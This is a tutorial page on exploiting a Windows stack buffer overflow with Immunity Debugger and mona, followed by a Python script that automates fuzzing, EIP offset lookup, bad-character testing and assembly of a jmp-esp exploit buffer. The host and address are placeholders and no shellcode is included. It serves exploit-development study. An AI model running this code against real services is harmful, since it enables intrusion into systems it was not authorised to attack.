Buffer Overflow
Last updated
Run Immunity Debugger.
Open the target exe in it, or attach to the already-running service.
Set the mona working directory, so that the pattern and bytearray files mona writes later end up in a known folder.
Press the play button so the process actually runs; a paused process will not accept connections.
Connect to the service from the attacking machine to confirm it is reachable.
Immunity Debugger shows which port the service is listening on.
Fuzz with increasingly long buffers until the service crashes, and note the buffer length at which it happened.
Generate a cyclic pattern with a script and send it exactly the way the fuzzer sent its data; make the pattern length the crash length plus about 200 bytes so it reaches past EIP.
Read the EIP value from the debugger and look up its offset in the pattern with mona or another pattern-offset tool,
or paste the EIP value into an online pattern-offset calculator.
[Optional] Verify the offset: send <offset> bytes of A, then BBBB, then filler, and confirm EIP reads 42424242.
Generate a bytearray with mona (this needs the working directory set in the earlier step).
Build the same byte string in the Python script, starting with only "\x00" excluded.
Send the bad-char buffer and compare it with mona against the bytearray file at the ESP address.
How to read the comparison and note bad chars:
00 is always a bad char.
The next byte that differs from what was sent (the second one in this walk-through) is a bad char.
The byte after it (the third) is usually corrupted only as a side effect of the second, so it is not a bad char.
The next differing byte after that (the fourth) is a bad char.
The fifth is collateral of the fourth, so not a bad char.
And so on: a single bad char can make every byte after it look wrong, so exclude one bad char at a time, regenerate both the bytearray and the buffer, and resend rather than excluding everything mona lists at once.
Repeat until the mona memory comparison result reads "Unmodified"; at that point the bad-char list is complete.
Search the loaded modules for a "jmp esp" instruction. You control EIP, and ESP points at the start of your payload, so pointing EIP at a "jmp esp" always transfers execution to the payload. Choose a module without ASLR, Rebase or SafeSEH, and make sure the address itself contains none of the bad chars.
Take the address of that jmp esp and write it into the buffer in reverse byte order (little-endian), because that is how x86 stores the dword that gets popped into EIP.
Generate the shellcode with the bad chars excluded, and place it after the return address; a short NOP sled in front of it gives an encoded payload room to decode.
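The script side of the whole procedure, from the fuzzing loop through offset lookup, bad-char buffers and the final buffer with the little-endian jmp esp address, as an added Python example that is not part of the original page. The host, port, crash length, EIP value and jmp esp address in it are assumed placeholders, not findings from any target; the mona commands quoted in the module docstring are the ones that correspond to each step.

```python
"""Stack-overflow helper for the Immunity Debugger + mona workflow (added example).

HOST/PORT, the crash length, the EIP value and the jmp esp address below are
assumed placeholders, not findings from any real target.

Matching mona commands (typed into Immunity Debugger):
  !mona config -set workingfolder c:\\mona\\%p
  !mona pattern_create 2700      !mona pattern_offset 386F4337
  !mona bytearray -b "\\x00"      !mona compare -f c:\\mona\\<app>\\bytearray.bin -a <ESP>
  !mona jmp -r esp -cpb "\\x00"
"""
import socket
import string
import struct

# Metasploit-style cyclic pattern (Aa0Aa1...Zz9); unique for 20280 bytes.
_FULL_PATTERN = "".join(
    u + l + d
    for u in string.ascii_uppercase
    for l in string.ascii_lowercase
    for d in string.digits
).encode()


def send_to_target(host, port, data, timeout=3.0):
    """Send one buffer. True if the service answered, False if the connection
    was refused, reset or timed out (the service has probably crashed)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.recv(1024)      # banner, if the protocol sends one
            s.sendall(data)
            s.recv(1024)      # a crashed service never answers here
        return True
    except OSError:
        return False


def find_crash_length(send_fn, start=100, step=100, limit=5000):
    """Fuzzing: grow the buffer until send_fn reports a crash; return that length."""
    for length in range(start, limit + 1, step):
        if not send_fn(b"A" * length):
            return length
    return None  # no crash up to limit


def pattern_create(length):
    """Cyclic pattern of the requested length (crash length + ~200)."""
    repeats = length // len(_FULL_PATTERN) + 1
    return (_FULL_PATTERN * repeats)[:length]


def pattern_offset(eip_hex):
    """EIP as the debugger shows it, e.g. '386F4337' -> offset into the pattern.
    The register holds a little-endian dword, so its bytes appear reversed in memory."""
    needle = struct.pack("<I", int(eip_hex, 16))
    idx = _FULL_PATTERN.find(needle)
    return idx if idx >= 0 else None


def eip_check_buffer(offset, total_len):
    """Optional check: EIP should read 42424242 after sending this."""
    return b"A" * offset + b"BBBB" + b"C" * (total_len - offset - 4)


def badchar_buffer(exclude=(0x00,)):
    """Every byte value minus the ones already known bad (\\x00 from the start)."""
    return bytes(b for b in range(256) if b not in exclude)


def first_badchar(sent, seen):
    """Compare the bytes sent with what the debugger shows at ESP.
    Returns the first byte that differs, or None when memory is 'unmodified'.
    Only the first difference is trusted: the byte after a bad char is usually
    collateral damage, so exclude one char, resend and compare again."""
    for i, b in enumerate(sent):
        if i >= len(seen) or seen[i] != b:
            return b
    return None


def little_endian(addr):
    """0x625011AF -> b'\\xaf\\x11\\x50\\x62' (the 'write it reversed' step)."""
    return struct.pack("<I", addr)


def build_exploit(offset, jmp_esp_addr, shellcode, badchars=(0x00,), nop_sled=16):
    """Final buffer: padding up to EIP, jmp esp address, NOP sled, shellcode."""
    addr = little_endian(jmp_esp_addr)
    bad = set(badchars)
    if bad & set(addr):
        raise ValueError("jmp esp address contains a bad char, pick another one")
    if bad & set(shellcode):
        raise ValueError("shellcode contains a bad char, re-encode it")
    return b"A" * offset + addr + b"\x90" * nop_sled + shellcode


if __name__ == "__main__":
    HOST, PORT = "192.0.2.10", 9999   # assumed placeholder target
    crash = find_crash_length(lambda d: send_to_target(HOST, PORT, d))
    if crash is None:
        raise SystemExit("no crash up to the length limit")
    print("service crashed with a buffer of", crash, "bytes")
    send_to_target(HOST, PORT, pattern_create(crash + 200))
    # Read EIP in Immunity, then e.g.: offset = pattern_offset("386F4337")
    # send_to_target(HOST, PORT, eip_check_buffer(offset, crash + 200))
    # send_to_target(HOST, PORT, b"A" * offset + b"BBBB" + badchar_buffer())
    # send_to_target(HOST, PORT, build_exploit(offset, 0x625011AF, shellcode, badchars))
```

The functions mirror the steps one to one so that each can be rerun on its own while you read registers in the debugger; only the bad-char step is deliberately one-at-a-time, because a single truncating byte makes every later byte look mangled in the comparison.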